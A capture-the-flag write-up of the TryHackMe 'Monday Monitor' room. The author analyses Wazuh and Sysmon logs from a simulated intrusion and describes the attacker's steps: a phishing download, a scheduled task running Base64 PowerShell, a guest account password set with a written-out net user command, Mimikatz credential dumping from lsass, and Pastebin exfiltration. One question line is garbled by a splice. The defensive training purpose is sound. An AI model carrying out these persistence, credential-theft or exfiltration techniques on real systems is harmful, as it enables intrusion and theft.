Refer to Mondaymonitor for the challenge room on TryHackMe
Scenario
Swiftspend Finance, the coolest fintech company around, is enhancing its cybersecurity to protect against digital threats and keep customers safe. Led by the tech-savvy Senior Security Engineer John Sterling, Swiftspend is focusing on improving endpoint monitoring with Wazuh and Sysmon. They’ve conducted tests to evaluate their security measures, and now they need your expertise.
The tests took place on April 29, 2024, from 12:00 PM to 8:00 PM. Your task is to analyze the logs for any suspicious processes or unusual network connections. Your mission is to uncover insights and help refine Swiftspend’s defenses.
Task
Once logged in, navigate to the Security Events module and use the saved query Monday_Monitor to access the logs. As well as selecting the period according to the description.
Initial access was established using a downloaded file. What is the file name saved on the host?
Given that the question referenced 'download file,' I used the term 'http' in the search head.
I identified a PowerShell script that downloads a file (SwiftSpend_Financial_Expenses.xlsm) from localhost and saves it as PhishingAttachment.xlsm in the TEMP\ directory.
What is the full command run to create a scheduled task?
To monitor the scheduled task, I utilized schtasks.exe on the search head.
I discovered that the script configures both a Windows registry entry and a scheduled. It is set to execute a PowerShell command daily at 12:34 PM, which will decode and execute the registry entry.
Note: schtasks.exe is a Windows utility used for creating, deleting, configuring, and displaying scheduled tasks.
What time is the scheduled task meant to run?
According to the previous screenshot, the scheduled task is set to activate daily at 12:34 PM.
What was encoded?
The previous screenshot indicates that the string is encoded in Base64 (cGluZyB3d3cueW91YXJldnVsbmVyYWJsZS50aG0=). By using CyberChef to decode this string, I obtain the original content.
What password was set for the new user account?
I utilized the search query data.win.eventdata.commandLine:*net* *user* on the search head, as the query pertained to user account modifications.
From the provided screenshots, it is evident that the 'guest' account was activated using the /activate:yes parameter. Subsequently, the command net user guest I_AM_M0NIT0R1NG was executed, setting the 'guest' account password to I_AM_M0NIT0R1NG.
Note: net.exe is a tool for managing user accounts, network resources, services, and various network settings in Windows.
What is the name of the .exe that was used to dump credentials?
Knowing that Mimikatz is a credential dumping tool, I used it in the search head.
From the output, I discovered a script executes memotech.exe (originally named Mimikatz.exe) to analyze a memory dump file (lsass.DMP) and extract detailed logon credentials using the sekurlsa plugin commands. After the extraction of credentials, the tool terminates itself.
What is the name of the .exe that was used to dump credentiData was exfiltrated from the host. What was the flag that was part of the data?als?
By searching for the keyword "post" in data.win.eventdata.commandLine, I discovered the only log entry indicating that the script uploads secrets and API keys to Pastebin via its API. The script configures the API key, the content to be posted, and the Pastebin API URL, then sends a POST request with this data.
